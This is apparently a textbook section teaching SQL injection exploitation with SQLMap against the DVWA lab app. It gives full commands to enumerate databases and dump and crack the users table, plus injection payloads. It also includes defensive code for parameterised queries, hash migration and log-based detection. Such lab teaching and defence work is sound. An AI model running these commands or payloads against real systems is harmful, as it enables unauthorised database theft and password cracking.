5.7. Exploiting SQLi Using SQLMap

Manual searching and testing for SQLi vulnerabilities can be time-consuming. Moreover, for each DBMS, you need to find appropriate SQL statements, as the syntax and built-in functions may differ. Of course, you can create a list of all possible SQL statements and then run fuzzing. However, the main task of fuzzing is to find and confirm the vulnerability. The actual exploitation or hacking will have to be done manually or with the help of other specialized programs. There are programs that allow you to combine all these steps and perform complex tasks for you, but most of them are paid and quite expensive.

However, there is a free alternative: SQLMap, which comes preinstalled in Kali. The program has a large number of options, all of which are listed by the sqlmap -hh command (the extended help). SQLMap allows you to perform the following operations:

  • Extract complete information about the DBMS and the type of operating system.
  • Extract the contents of the database.
  • Crack passwords. If the database contains hashes, the program will automatically try to crack them.
  • Execute operating system commands.
  • Get an interactive shell to control the vulnerable server. Usually, this option rarely works because a special file must be written to the vulnerable server, which will then be executed. Therefore, you need to know the directory/folder that has write file permissions. Additionally, the DBMS session user must have the necessary privileges.

Let's look at how SQLMap works using the DVWA application as an example. Open the application, log in, and select the SQL Injection option. Enter any digit (e.g., 1) and intercept the request in Burp Suite. Copy the URL and the Cookie header; the cookie is needed because the page is only reachable after logging in to the site:

Captured request with Cookie

Now, using the available data, let's run SQLMap:

sqlmap --url="http://10.0.2.15/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=qje743rmifb453hrs0rsf31mc7; security_level=0" --method GET --data="id=1&Submit=Submit" -p "id" --dbs --batch

where

--url – the tested URL,

--cookie – the necessary cookies,

--method – the HTTP method used,

--data – the data being sent,

-p – the tested parameters. If there are multiple parameters, list them all separated by commas,

--dbs – enumerate the names of the available databases,

--batch – during testing, the program stops and prompts the user for decisions. The --batch option accepts the default answer to every prompt; this is convenient, but in some cases it is better to avoid it and answer the prompts yourself.

Here's what we have:

Successful attack in SQLMap

The program has returned quite a bit of data, including the SQL payloads that worked. In our case, four injection techniques were successful. The list of databases is displayed at the bottom.
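To see why the id parameter could be exploited at all, here is an added illustration (not code from DVWA or SQLMap): the same lookup written in the vulnerable style, where the request parameter is pasted into the SQL text, and in the safe, parameterised style. The table layout, user names and the in-memory SQLite database are constructed for the example; DVWA's real schema is not assumed.

```python
import sqlite3

# Constructed stand-in for a 'users' table (assumed layout, not DVWA's own schema).
SAMPLE_USERS = [
    (1, "alice", "<hash-placeholder-1>"),
    (2, "bob", "<hash-placeholder-2>"),
    (3, "carol", "<hash-placeholder-3>"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """The pattern SQLMap exploits: the raw request parameter becomes part of the SQL text."""
    sql = f"SELECT user_id, username FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameterised query: the value is bound by the driver and is never parsed as SQL."""
    return conn.execute(
        "SELECT user_id, username FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def is_valid_id(value: str) -> bool:
    """Defence in depth: the id is numeric, so reject anything else before it reaches the DB."""
    return value.isdigit()


def leaks_db_error(conn: sqlite3.Connection, value: str) -> bool:
    """True when the vulnerable lookup raises a database error for this input.

    Passing such errors through to the HTTP response is what makes error-based
    detection possible, so an application should catch them and return a generic page.
    """
    try:
        lookup_vulnerable(conn, value)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    conn = make_db()
    probe = "1' OR '1'='1"  # classic tautology: WHERE user_id = '1' OR '1'='1'
    print("vulnerable:", lookup_vulnerable(conn, probe))  # every row comes back
    print("safe:      ", lookup_safe(conn, probe))  # the literal string matches no id
    print("valid id?  ", is_valid_id(probe))
    print("leaks error:", leaks_db_error(conn, "1'"))
```

Running it shows the tautology payload returning all three rows from the vulnerable lookup and none from the parameterised one; the same payload is also rejected by the numeric allow-list before any query is built.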

Now, let's look inside the database named 'dvwa'. To start, let's see what tables it contains:

sqlmap --url="http://10.0.2.15/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=qje743rmifb453hrs0rsf31mc7; security_level=0" --method GET --data="id=1&Submit=Submit" -p "id" -D dvwa --tables --batch

where

-D – specifies the name of the database,

--tables – displays the list of tables:

Retrieving tables with SQLMap

Let's check the 'users' table:

sqlmap --url="http://10.0.2.15/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=qje743rmifb453hrs0rsf31mc7; security_level=0" --method GET --data="id=1&Submit=Submit" -p "id" -D dvwa -T users --dump --batch

where

-T – specifies the name of the table being examined,

--dump – extracts the entire contents of the table:

Dumped info from database with SQLMap

The table contains usernames and the hashes of their passwords. The program automatically cracked the hashes and recovered the passwords. Because MD5 was used as the hashing function, cracking took only a few seconds. When a stronger hashing function is in use, it is better not to use the --batch option, so that you can decide interactively how the hashes are handled.
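The fast cracking above is the consequence of storing bare MD5 digests. As an added example (not part of the original text or of DVWA), the following code shows what a defender does with such a dump: detect stored values that look like unsalted MD5, store new passwords with a salted, iterated KDF (PBKDF2-HMAC-SHA256 from the standard library), and re-hash a legacy MD5 credential transparently the next time its owner logs in. The sample rows and the storage format "pbkdf2_sha256$iterations$salt$digest" are constructed for the example.

```python
import hashlib
import hmac
import re
import secrets

MD5_HEX = re.compile(r"[0-9a-f]{32}")
DEFAULT_ITERATIONS = 600_000  # tune to your hardware; higher means slower cracking


def is_unsalted_md5(stored: str) -> bool:
    """A 32-character hex string is the fingerprint of a bare MD5 digest."""
    return MD5_HEX.fullmatch(stored.strip().lower()) is not None


def audit_dump(rows) -> list:
    """rows: iterable of (username, stored_value). Returns users whose hash needs migrating."""
    return [username for username, stored in rows if is_unsalted_md5(stored)]


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS) -> str:
    """Salted, iterated hash. The random salt defeats precomputed tables,
    the iteration count makes each guess expensive."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        alg, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if alg != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def migrate_on_login(password: str, stored: str, iterations: int = DEFAULT_ITERATIONS):
    """Returns (login_ok, new_stored_value_or_None).

    A legacy MD5 entry is checked once with MD5 and, on success, replaced by a
    PBKDF2 entry so the weak hash disappears from the table over time.
    """
    if is_unsalted_md5(stored):
        legacy = hashlib.md5(password.encode()).hexdigest()
        if hmac.compare_digest(legacy, stored.strip().lower()):
            return True, hash_password(password, iterations)
        return False, None
    return verify_password(password, stored), None


# Constructed sample rows: one legacy MD5 entry, one already migrated entry.
SAMPLE_ROWS = [
    ("alice", hashlib.md5(b"constructed-password-1").hexdigest()),
    ("bob", hash_password("constructed-password-2", iterations=10_000)),
]

if __name__ == "__main__":
    print("needs migration:", audit_dump(SAMPLE_ROWS))
    ok, new_value = migrate_on_login("constructed-password-1", SAMPLE_ROWS[0][1])
    print("alice login ok:", ok, "re-hashed as:", new_value[:30] + "...")
```

The audit function is the piece to run over a real dump of your own users table: any entry it returns would fall to a wordlist in seconds exactly as shown in the figure above.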

As mentioned earlier, the program can also access the file system and operating system of the vulnerable server using the options listed below:

SQLMap options

However, whether this works depends on the privileges of the database session user and on the file system permissions of the server.
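Every step in this section leaves a trail in the web server's access log: dozens of requests to the same id parameter carrying quotes, UNION SELECT, boolean conditions and time delays. As an added example from the defender's side (not part of the original text), the following script parses combined-format access log lines, decodes the query string and flags requests whose parameter values or User-Agent match SQL injection signatures, then summarises the hits per client address. The log lines are constructed to mirror the DVWA request used above; the payloads and the "sqlmap/..." User-Agent value are illustrative, not captured traffic, and the signature set is a starting point, not a complete WAF rule set.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines modelled on the DVWA request in this section.
LOG_LINES = [
    '10.0.2.4 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4523 "-" "Mozilla/5.0"',
    '10.0.2.4 - - [10/Oct/2023:13:55:37 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201234%3D1234%20AND%20%27abc%27%3D%27abc&Submit=Submit HTTP/1.1" 200 4523 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '10.0.2.4 - - [10/Oct/2023:13:55:37 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-&Submit=Submit HTTP/1.1" 200 5102 "-" "Mozilla/5.0"',
    '10.0.2.9 - - [10/Oct/2023:13:56:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=3&Submit=Submit HTTP/1.1" 200 4510 "-" "Mozilla/5.0"',
    '10.0.2.4 - - [10/Oct/2023:13:56:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29--%20-&Submit=Submit HTTP/1.1" 200 4523 "-" "Mozilla/5.0"',
]

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures applied to each decoded parameter value.
SQLI_SIGNATURES = {
    "union-select": re.compile(r"\bunion\b[\s\S]*?\bselect\b", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
    "boolean-logic": re.compile(r"['\"]\s*(and|or)\s+['\"\d]", re.I),
    "comment": re.compile(r"--\s|/\*"),
}


def flag_request(path: str, user_agent: str) -> list:
    """Return the sorted list of signature names this request triggers ([] if clean)."""
    reasons = set()
    # The default tool User-Agent starts with "sqlmap/"; it is trivially changed,
    # so treat it as a bonus indicator, not the primary one.
    if "sqlmap" in user_agent.lower():
        reasons.add("sqlmap-ua")
    query = urlsplit(path).query
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:  # parse_qs has already percent-decoded the value
            for name, pattern in SQLI_SIGNATURES.items():
                if pattern.search(value):
                    reasons.add(name)
    return sorted(reasons)


def summarize(lines) -> dict:
    """Per client IP: total requests, flagged requests and the union of reasons."""
    summary = {}
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # unparseable line; a production job would count these too
        entry = summary.setdefault(
            match["ip"], {"requests": 0, "flagged": 0, "reasons": set()}
        )
        entry["requests"] += 1
        reasons = flag_request(match["path"], match["ua"])
        if reasons:
            entry["flagged"] += 1
            entry["reasons"].update(reasons)
    return summary


if __name__ == "__main__":
    for ip, entry in summarize(LOG_LINES).items():
        print(f"{ip}: {entry['flagged']}/{entry['requests']} flagged, reasons={sorted(entry['reasons'])}")
```

On the constructed input, 10.0.2.4 has three of four requests flagged for four different reasons while 10.0.2.9 has none; in practice the ratio of flagged requests to total requests from one address within a short window is a better alert trigger than any single signature.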